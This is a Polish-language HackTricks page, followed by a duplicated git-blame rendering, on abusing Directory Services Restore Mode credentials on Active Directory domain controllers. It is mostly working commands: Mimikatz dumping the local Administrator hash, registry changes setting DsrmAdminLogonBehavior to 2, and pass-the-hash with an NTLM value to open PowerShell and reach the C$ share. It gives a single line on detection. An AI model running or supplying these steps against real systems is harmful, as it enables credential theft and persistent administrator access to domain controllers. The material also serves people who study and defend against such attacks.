hacktricks/windows-hardening/active-directory-methodology/dsrm-credentials.md

<details>

<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Inne sposoby wsparcia HackTricks:

* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.

</details>


# Poświadczenia DSRM

W każdym **DC** znajduje się **lokalne konto administratora**. Posiadając uprawnienia administratora na tym komputerze, możesz użyć mimikatz, aby **wydobyć skrót lokalnego hasła Administratora**. Następnie, modyfikując rejestr, **aktywujesz to hasło**, dzięki czemu możesz zdalnie uzyskać dostęp do tego lokalnego użytkownika Administratora.\
Najpierw musimy **wydobyć** skrót **hasła** lokalnego użytkownika Administratora wewnątrz DC:
```bash
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
```
Następnie musimy sprawdzić, czy to konto będzie działać, a jeśli klucz rejestru ma wartość "0" lub nie istnieje, musisz **ustawić go na "2"**:
```bash
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"
```
Następnie, używając PTH, możesz **wyświetlić zawartość C$ lub nawet uzyskać powłokę**. Zauważ, że aby utworzyć nową sesję PowerShell z tym hasłem w pamięci (dla PTH), **"domena" używana to po prostu nazwa maszyny DC:**
```bash
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
```
Więcej informacji na ten temat znajdziesz tutaj: [https://adsecurity.org/?p=1714](https://adsecurity.org/?p=1714) i [https://adsecurity.org/?p=1785](https://adsecurity.org/?p=1785)

## Zapobieganie

* Identyfikator zdarzenia 4657 - Audyt tworzenia/zmiany `HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior`


<details>

<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Inne sposoby wsparcia HackTricks:

* Jeśli chcesz zobaczyć **reklamę swojej firmy w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated to Polish 2024-02-11 01:46:25 +00:00			`<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`Inne sposoby wsparcia HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`* Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź [PLAN SUBSKRYPCJI](https://github.com/sponsors/carlospolop)!`
			`* Zdobądź [oficjalne gadżety PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Odkryj [Rodzinę PEASS](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [NFT](https://opensea.io/collection/the-peass-family)`
			`* Dołącz do 💬 [grupy Discord](https://discord.gg/hRep4RUj7f) lub [grupy telegramowej](https://t.me/peass) lub śledź nas na Twitterze 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do [HackTricks](https://github.com/carlospolop/hacktricks) i [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`


Translated to Polish 2024-02-11 01:46:25 +00:00			`# Poświadczenia DSRM`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`W każdym DC znajduje się lokalne konto administratora. Posiadając uprawnienia administratora na tym komputerze, możesz użyć mimikatz, aby wydobyć skrót lokalnego hasła Administratora. Następnie, modyfikując rejestr, aktywujesz to hasło, dzięki czemu możesz zdalnie uzyskać dostęp do tego lokalnego użytkownika Administratora.\`
			`Najpierw musimy wydobyć skrót hasła lokalnego użytkownika Administratora wewnątrz DC:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'`
			```
Translated to Polish 2024-02-11 01:46:25 +00:00			`Następnie musimy sprawdzić, czy to konto będzie działać, a jeśli klucz rejestru ma wartość "0" lub nie istnieje, musisz ustawić go na "2":`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value`
			`New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist`
			`Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"`
			```
Translated to Polish 2024-02-11 01:46:25 +00:00			`Następnie, używając PTH, możesz wyświetlić zawartość C$ lub nawet uzyskać powłokę. Zauważ, że aby utworzyć nową sesję PowerShell z tym hasłem w pamięci (dla PTH), "domena" używana to po prostu nazwa maszyny DC:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe`
			`#And in new spawned powershell you now can access via NTLM the content of C$`
			`ls \\dc-host-name\C$`
			```
Translated to Polish 2024-02-11 01:46:25 +00:00			`Więcej informacji na ten temat znajdziesz tutaj: [https://adsecurity.org/?p=1714](https://adsecurity.org/?p=1714) i [https://adsecurity.org/?p=1785](https://adsecurity.org/?p=1785)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`## Zapobieganie`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			* Identyfikator zdarzenia 4657 - Audyt tworzenia/zmiany `HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

Translated to Polish 2024-02-11 01:46:25 +00:00			`<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`Inne sposoby wsparcia HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`* Jeśli chcesz zobaczyć reklamę swojej firmy w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź [PLAN SUBSKRYPCJI](https://github.com/sponsors/carlospolop)!`
			`* Zdobądź [oficjalne gadżety PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Odkryj [Rodzinę PEASS](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [NFT](https://opensea.io/collection/the-peass-family)`
			`* Dołącz do 💬 [grupy Discord](https://discord.gg/hRep4RUj7f) lub [grupy telegramowej](https://t.me/peass) lub śledź nas na Twitterze 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do [HackTricks](https://github.com/carlospolop/hacktricks) i [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`